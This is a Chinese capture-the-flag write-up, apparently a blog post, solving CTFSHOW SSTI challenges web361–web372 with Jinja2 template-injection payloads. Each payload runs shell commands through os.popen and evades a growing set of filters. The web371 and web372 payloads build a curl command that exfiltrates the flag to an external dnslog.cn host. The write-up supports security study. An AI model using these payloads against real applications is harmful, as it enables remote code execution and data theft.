zoukankan      html  css  js  c++  java

  • CTFSHOW SSTI 刷题

    CTFSHOW SSTI 刷题

    目录

    前言

    好久没写SSTI的题目了,刚好CTFSHOW之前有几题相关的题目,把他们拿下!

    web361&web362

    没有任何的过滤,直接上

    Payload:?name={{lipsum.__globals__.__getitem__("os").popen("cat /flag").read()}}

    362不确定过滤是啥,Payload直接打的

    web363

    过滤了单双引号,可以用request对象的方法绕过

    Payload:?name={{lipsum.__globals__.__getitem__(request.args.a).popen(request.args.b).read()}}&a=os&b=cat /flag

    web364&web365

    进一步过滤了request.args,本来想用POST请求的,但是请求方式不行,转而用request.cookies

    Payload:?name={{lipsum.__globals__.__getitem__(request.cookies.a).popen(request.cookies.b).read()}}

带上Cookie:a=os;b=cat /flag

    365不确定过滤了啥用364的Payload成功

    web366&web367

    进一步过滤了__globals____getitem__[],开始使用flask的过滤器

    Payload:?name={{((lipsum|attr(request.cookies.c))|attr(request.cookies.d)(request.cookies.a)).popen(request.cookies.b).read()}}

带上Cookie:a=os;b=cat /flag;c=__globals__;d=__getitem__

    367不确定过滤了啥用366的Payload成功

    web368

    过滤了{{}},使用{%%}绕过

    Payload:?name={% print(((lipsum|attr(request.cookies.c))|attr(request.cookies.d)(request.cookies.a)).popen(request.cookies.b).read())%}

带上Cookie:a=os;b=cat /flag;c=__globals__;d=__getitem__

    web369

    这题直接把request给ban了,我直接万脸迷茫!!!然后复习了一下羽师傅的SSTI进阶文章

    这里是{%%}所以说可以执行代码,然后通过拼接字符赋值给变量,组成我们想要的内容

    Payload:?name={%set a=dict(po=aa,p=aa)|join%}{% set b=(lipsum|string|list)|attr(a)(18)%}{%set c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}{%set d=(b,b,dict(getit=cc,em=aa)|join,b,b)|join%}{%set e=dict(o=cc,s=aa)|join%}{% set f=(lipsum|string|list)|attr(a)(9)%}{%set g=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-8)%}{%set i=(dict(cat=aa)|join,f,g,dict(flag=aa)|join)|join%}{%print ((lipsum|attr(c))|attr(d)(e)).popen(i).read()%}

    web370

    直接把数字都给ban了,这里想到可以使用count进行计数

    Payload:?name={%set a=dict(po=aa,p=aa)|join%}{%set j=dict(eeeeeeeeeeeeeeeeee=a)|join|count%}{%set k=dict(eeeeeeeee=a)|join|count%}{%set l=dict(eeeeeeee=a)|join|count%}{% set b=(lipsum|string|list)|attr(a)(j)%}{%set c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}{%set d=(b,b,dict(getit=cc,em=aa)|join,b,b)|join%}{%set e=dict(o=cc,s=aa)|join%}{% set f=(lipsum|string|list)|attr(a)(k)%}{%set g=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-l)%}{%set i=(dict(cat=aa)|join,f,g,dict(flag=aa)|join)|join%}{%print ((lipsum|attr(c))|attr(d)(e)).popen(i).read()%}

    web371

    这题花了很长的时间来构造,因为他把print给ban掉了,这里只能想到外带数据,这样就要构造

    ping `cat /flag`.vhthja.dnslog.cn

    这种格式,那就得去找反引号和点,最后发现ping用不了,但是curl可以

    Payload:?name={%set a=dict(po=aa,p=aa)|join%}{%set j=dict(eeeeeeeeeeeeeeeeee=a)|join|count%}{%set k=dict(eeeeeeeee=a)|join|count%}{%set l=dict(eeeeeeee=a)|join|count%}{%set n=dict(eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee=a)|join|count%}{%set m=dict(eeeeeeeeeeeeeeeeeeee=a)|join|count%}{% set b=(lipsum|string|list)|attr(a)(j)%}{%set c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}{%set d=(b,b,dict(getit=cc,em=aa)|join,b,b)|join%}{%set e=dict(o=cc,s=aa)|join%}{% set f=(lipsum|string|list)|attr(a)(k)%}{%set g=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-l)%}{%set p=((lipsum|attr(c))|string|list)|attr(a)(n)%}{%set q=((lipsum|attr(c))|string|list)|attr(a)(m)%}{%set i=(dict(curl=aa)|join,f,p,dict(cat=a)|join,f,g,dict(flag=aa)|join,p,q,dict(vhthja=a)|join,q,dict(dnslog=a)|join,q,dict(cn=a)|join)|join%}{%if ((lipsum|attr(c))|attr(d)(e)).popen(i)%}atao{%endif%}

    web372

    最后一题ban掉了count,没啥想法了,看了羽师傅的文章才知道-->可以用length替代count,nb

    Payload:?name={%set a=dict(po=aa,p=aa)|join%}{%set j=dict(eeeeeeeeeeeeeeeeee=a)|join|length%}{%set k=dict(eeeeeeeee=a)|join|length%}{%set l=dict(eeeeeeee=a)|join|length%}{%set n=dict(eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee=a)|join|length%}{%set m=dict(eeeeeeeeeeeeeeeeeeee=a)|join|length%}{% set b=(lipsum|string|list)|attr(a)(j)%}{%set c=(b,b,dict(glob=cc,als=aa)|join,b,b)|join%}{%set d=(b,b,dict(getit=cc,em=aa)|join,b,b)|join%}{%set e=dict(o=cc,s=aa)|join%}{% set f=(lipsum|string|list)|attr(a)(k)%}{%set g=(((lipsum|attr(c))|attr(d)(e))|string|list)|attr(a)(-l)%}{%set p=((lipsum|attr(c))|string|list)|attr(a)(n)%}{%set q=((lipsum|attr(c))|string|list)|attr(a)(m)%}{%set i=(dict(curl=aa)|join,f,p,dict(cat=a)|join,f,g,dict(flag=aa)|join,p,q,dict(fgpozq=a)|join,q,dict(dnslog=a)|join,q,dict(cn=a)|join)|join%}{%if ((lipsum|attr(c))|attr(d)(e)).popen(i)%}atao{%endif%}
  • 相关阅读:
    tomcat发布的class中有一部分类会生成同名的XXX$1.class
    报错:The method encodeBase64String(byte[]) is undefined for the type Base64
    bootstrap中的fileInput上传文件时,文件名称中有-(中划线)改为了_下划线
    java中去html/jsp等前台页面 造成的空格
    # 50 个最常被问到的 Selenium 面试问题和答案
    # 为什么测试人员学习测试自动化(仍然)如此困难
    # 如何引进高级的 IT 自动化项目:一个 3 步走计划
    **Selenium IDE、Selenium RC 和 WebDriver 之间有什么区别?**
    pandas 数据分析好的博文
    pandas contains 函数
  • 原文地址:https://www.cnblogs.com/erR0Ratao/p/14397131.html
Copyright © 2011-2022 走看看